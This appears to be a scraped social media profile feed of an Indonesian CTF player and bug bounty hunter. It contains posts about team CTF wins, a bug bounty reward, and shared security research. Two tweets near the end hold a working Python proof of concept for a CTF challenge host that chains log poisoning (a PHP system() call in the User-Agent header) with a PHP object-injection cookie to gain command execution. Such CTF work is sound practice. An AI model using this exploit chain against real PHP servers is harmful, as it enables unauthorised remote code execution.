Just got a reward for a critical vulnerability submitted on @yeswehack -- Improper Authentication - Generic (CWE-287). #YesWeRHackers
English
Dimas Maulana
87 posts
Dimas Maulana
@dimasma__
Active CTF Player and Member of TCP1P, SKSD, & Project Sekai | Bug Bounty Hunter at PatchStack | Cybersecurity Enthusiast | part time HackTheBox Challmaker
Bali Entrou em Kasım 2020
53 Seguindo163 Seguidores
Dimas Maulana retweetou
HAProxy HTTP/3 -> HTTP/1 Desync: Cross-Protocol Smuggling via a Standalone QUIC FIN (CVE-2026-33555) r3verii.github.io/cve/2026/04/14…
English
See this Instagram photo by @imphnen.dev instagram.com/p/DSUs-WYiUQT/…
English
Over the weekend, our team competed in XCTF Finals in China as the only international team among 28. We placed 3rd place overall and 1st in the professional division. Huge thanks to @XCTF_League for the amazing event and high quality challenges. Hope to be back next year!
English
@ProjectSEKAIctf @XCTF_League GG project Sekai, Great team work!
English
@HIGHTECHS3C thank u mas nosa, memang rill sih dunia CTF sekarang kaya lebih speed up dari pada dulu, sekarang bahkan banyak yang lebih jago, idk kayanya saya aja yang kebanyakan AFK mean while mereka grinding nonstop atau mereka aja yang learningnya cepet banget, kayanya keduanya sih wkwk.
Indonesia
TERBAIK EMANG ANAK2 CETEEP INI, Regenerasinya sejak dulu gw akuin bagus bagus banget. Tiap tahun selalu muncul penerus barunya. Kudos for all of the indonesian players who participated on the events 🔥🔥🔥
Dimas Maulana@dimasma__
Indonesians just won 2 international CTF at same time this month! Pic: linkedin.com/posts/solderet…
Indonesia
Yes! We won! Project Sekai CTF took first place in the professional category at XCTF 2025 in China!
all credit given to all project Sekai member that participate in this ctf👌
English
@pawulooe hari hari di katain yang aneh2 gara2 challenge CTF😌
padahal beberapa bulan ini soalku banyak yang solve, dan enggak susah susah amat wkwk
Indonesia
iya mas dimas jago, tpi kalo buat chall web plis tolong untuk lebih memanusiakan manusia🙏
Dimas Maulana@dimasma__
Indonesians just won 2 international CTF at same time this month! Pic: linkedin.com/posts/solderet…
Indonesia
@AnakITKmrnSore thank u mas, sudah lama ga denger good news juga sebenernya wkwk
Indonesia
Finally, some good news 🎉🎉🎉🎉🎉🎉🎉🎉
Congrats mas..
Dimas Maulana@dimasma__
Yes! We won! Project Sekai CTF took first place in the professional category at XCTF 2025 in China! all credit given to all project Sekai member that participate in this ctf👌
English
Indonesians just won 2 international CTF at same time this month!
Pic: linkedin.com/posts/solderet…
English
Dimas Maulana retweetou
Very cool technique by @lukejahnke for POST based CSRF without a content-type header using a Blob object, Interestingly it also seems to work using a Uint8Array
Luke Jahnke@lukejahnke
My blog post shares the very simple (but very surprising!) JavaScript that results in this request being sent. Try and spot what header is missing! Read my blog post here: nastystereo.com/security/cross…
English
Wow! dimas took 3rd in AlpacaHack Round 2 (Web)!
#AlpacaHack
alpacahack.com/ctfs/round-2/c…
English
dir = "/var/log/nginx/access.log"
s = "25"
COOKIE = 'O:9:"PageModel":1:{s:4:"file";s:'+s+':"'+dir+'";}'
COOKIE = base64.b64encode(COOKIE.encode()).decode()
cmd = "cat /flag*"
log_poisoning(cmd)
print(COOKIE)
r = requests.get(URL, cookies={"PHPSESSID": COOKIE})
print(r.text)
English
POC:
import requests, base64
URL = "http://157.245.33.77:30524/"
def log_poisoning(cmd):
HEADER = {'User-Agent': "<?php system('"+cmd+"'); ?>"}
requests.get(URL, headers=HEADER)
print("[+] Log poisoning successful")
English
I just completed module Using the Metasploit Framework in HTB Academy! academy.hackthebox.com/achievement/38… #hackthebox #htbacademy #cybersecurity
English